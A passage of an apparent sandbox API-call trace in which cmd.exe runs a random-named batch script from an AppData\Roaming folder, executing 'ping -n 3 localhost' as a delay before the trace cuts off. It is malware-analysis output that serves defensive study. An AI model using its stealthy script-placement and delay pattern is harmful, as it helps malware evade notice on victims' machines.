(_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0098.534] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0098.534] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0098.534] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0098.534] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0098.534] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0098.534] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0098.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fc40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fc40, lpFilePart=0x22fc3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fc3c*="Desktop") returned 0x18 [0098.534] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.534] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f9bc | out: lpFindFileData=0x22f9bc) returned 0x38ffe0 [0098.534] FindClose (in: hFindFile=0x38ffe0 | out: hFindFile=0x38ffe0) returned 1 [0098.534] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f9bc | out: lpFindFileData=0x22f9bc) returned 0x38ffe0 [0098.534] FindClose (in: hFindFile=0x38ffe0 | out: hFindFile=0x38ffe0) returned 1 [0098.535] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f9bc | out: lpFindFileData=0x22f9bc) returned 0x38ffe0 [0098.535] FindClose (in: hFindFile=0x38ffe0 | out: hFindFile=0x38ffe0) returned 1 [0098.535] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.535] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0098.535] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0098.535] GetEnvironmentStringsW () returned 0x390150* [0098.535] FreeEnvironmentStringsW (penv=0x390150) returned 1 [0098.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.537] GetConsoleOutputCP () returned 0x1b5 [0098.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.538] GetUserDefaultLCID () returned 0x409 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd80, cchData=128 | out: lpLCData="0") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd80, cchData=128 | out: lpLCData="0") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd80, cchData=128 | out: lpLCData="1") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0098.539] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0098.540] GetConsoleTitleW (in: lpConsoleTitle=0x3901e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.540] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0098.540] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0098.540] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0098.544] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", _String2=")") returned 58 [0098.544] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 3 [0098.544] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 3 [0098.544] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 6 [0098.544] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 6 [0098.544] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 15 [0098.544] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd") returned 15 [0098.545] GetConsoleTitleW (in: lpConsoleTitle=0x22fa78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.648] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f834, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f82c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f82c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0098.649] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0098.649] SetErrorMode (uMode=0x0) returned 0x0 [0098.649] SetErrorMode (uMode=0x1) returned 0x0 [0098.649] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x39dc08, lpFilePart=0x22f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x22f598*="vMfCCeRYkvQy") returned 0x2d [0098.649] SetErrorMode (uMode=0x0) returned 0x1 [0098.649] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0098.649] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.653] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", fInfoLevelId=0x1, lpFindFileData=0x22f334, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f334) returned 0x3908f0 [0098.653] FindClose (in: hFindFile=0x3908f0 | out: hFindFile=0x3908f0) returned 1 [0098.653] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0098.653] GetConsoleTitleW (in: lpConsoleTitle=0x22f80c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.653] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0098.656] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0098.656] IdentifyCodeAuthzLevelW () returned 0x1 [0098.662] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0098.662] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0098.662] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0098.662] CloseCodeAuthzLevel () returned 0x1 [0098.662] SetErrorMode (uMode=0x0) returned 0x0 [0098.662] SetErrorMode (uMode=0x1) returned 0x0 [0098.662] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", nBufferLength=0x104, lpBuffer=0x3904e8, lpFilePart=0x22f6f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd", lpFilePart=0x22f6f8*="DGaezHhx.cmd") returned 0x3a [0098.662] SetErrorMode (uMode=0x0) returned 0x1 [0098.662] CmdBatNotification () returned 0x0 [0098.662] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0098.662] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0098.662] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.662] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.663] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.663] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.663] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x91, lpOverlapped=0x0) returned 1 [0098.663] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0098.663] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0098.663] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.663] GetFileType (hFile=0x58) returned 0x1 [0098.663] _get_osfhandle (_FileHandle=3) returned 0x58 [0098.663] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0098.664] _wcsicmp (_String1="ping", _String2=")") returned 71 [0098.664] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0098.664] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0098.664] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0098.664] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0098.664] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0098.664] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0098.665] _tell (_FileHandle=3) returned 21 [0098.665] _close (_FileHandle=3) returned 0 [0098.665] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f4f4 | out: _Buffer="\r\n") returned 2 [0098.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.665] GetFileType (hFile=0x7) returned 0x2 [0098.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b4 | out: lpMode=0x22f4b4) returned 1 [0098.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.665] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f4e0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f4e0*=0x2) returned 1 [0098.666] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0098.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.666] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f4f0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0098.666] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f4f0 | out: _Buffer=">") returned 1 [0098.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.666] GetFileType (hFile=0x7) returned 0x2 [0098.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b8 | out: lpMode=0x22f4b8) returned 1 [0098.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.666] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f4e4, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f4e4*=0x19) returned 1 [0098.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.666] GetFileType (hFile=0x7) returned 0x2 [0098.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f73c | out: lpMode=0x22f73c) returned 1 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x390958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x22f768, lpReserved=0x0 | out: lpBuffer=0x390958*, lpNumberOfCharsWritten=0x22f768*=0x4) returned 1 [0098.667] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f774 | out: _Buffer=" -n 3 localhost ") returned 16 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] GetFileType (hFile=0x7) returned 0x2 [0098.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f734 | out: lpMode=0x22f734) returned 1 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x22f760, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f760*=0x10) returned 1 [0098.667] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f794 | out: _Buffer="\r\n") returned 2 [0098.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.667] GetFileType (hFile=0x7) returned 0x2 [0098.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f754 | out: lpMode=0x22f754) returned 1 [0098.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f780, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f780*=0x2) returned 1 [0098.668] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0098.668] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0098.668] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0098.668] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0098.668] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0098.668] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0098.668] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0098.668] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0098.668] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0098.668] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0098.668] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0098.668] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0098.668] _wcsicmp (_String1="ping", _String2="START") returned -3 [0098.668] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0098.668] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0098.668] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0098.668] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0098.668] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0098.668] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0098.668] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0098.669] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0098.669] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0098.669] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0098.669] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0098.669] SetErrorMode (uMode=0x0) returned 0x0 [0098.669] SetErrorMode (uMode=0x1) returned 0x0 [0098.669] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a0550, lpFilePart=0x22f538 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f538*="Desktop") returned 0x18 [0098.669] SetErrorMode (uMode=0x0) returned 0x1 [0098.669] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.669] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.669] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.669] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.670] FindClose (in: hFindFile=0x3a0838 | out: hFindFile=0x3a0838) returned 1 [0098.670] FindClose (in: hFindFile=0x3a0838 | out: hFindFile=0x3a0838) returned 1 [0098.670] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.670] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.670] GetConsoleTitleW (in: lpConsoleTitle=0x22f304, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.670] SetErrorMode (uMode=0x0) returned 0x0 [0098.670] SetErrorMode (uMode=0x1) returned 0x0 [0098.670] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a0a98, lpFilePart=0x22ee24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ee24*="Desktop") returned 0x18 [0098.671] SetErrorMode (uMode=0x0) returned 0x1 [0098.671] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.671] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0098.671] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.671] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.671] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.671] FindClose (in: hFindFile=0x3a0d80 | out: hFindFile=0x3a0d80) returned 1 [0098.671] FindClose (in: hFindFile=0x3a0d80 | out: hFindFile=0x3a0d80) returned 1 [0098.671] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0098.671] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0098.671] GetConsoleTitleW (in: lpConsoleTitle=0x22f098, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.671] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ef20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22efe8 | out: lpAttributeList=0x22ef20, lpSize=0x22efe8) returned 1 [0098.671] UpdateProcThreadAttribute (in: lpAttributeList=0x22ef20, dwFlags=0x0, Attribute=0x60001, lpValue=0x22efe0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ef20, lpPreviousValue=0x0) returned 1 [0098.671] GetStartupInfoW (in: lpStartupInfo=0x22eedc | out: lpStartupInfo=0x22eedc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0098.671] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0098.672] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22ef7c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22efc8 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x22efc8*(hProcess=0x54, hThread=0x58, dwProcessId=0xbfc, dwThreadId=0xc00)) returned 1 [0098.759] CloseHandle (hObject=0x58) returned 1 [0098.759] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0098.759] GetEnvironmentStringsW () returned 0x390970* [0098.759] FreeEnvironmentStringsW (penv=0x390970) returned 1 [0098.759] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0102.955] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22eebc | out: lpExitCode=0x22eebc*=0x0) returned 1 [0102.955] CloseHandle (hObject=0x54) returned 1 [0102.955] _vsnwprintf (in: _Buffer=0x22f004, _BufferCount=0x13, _Format="%08X", _ArgList=0x22eec8 | out: _Buffer="00000000") returned 8 [0102.955] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0102.955] GetEnvironmentStringsW () returned 0x392c28* [0102.955] FreeEnvironmentStringsW (penv=0x392c28) returned 1 [0102.955] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0102.955] GetEnvironmentStringsW () returned 0x392c28* [0102.955] FreeEnvironmentStringsW (penv=0x392c28) returned 1 [0102.955] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ef20 | out: lpAttributeList=0x22ef20) [0102.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.955] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.956] SetConsoleInputExeNameW () returned 0x1 [0102.956] GetConsoleOutputCP () returned 0x1b5 [0102.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.956] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.956] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0102.956] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0102.956] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.956] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0102.957] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0102.957] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x7c, lpOverlapped=0x0) returned 1 [0102.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.957] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, 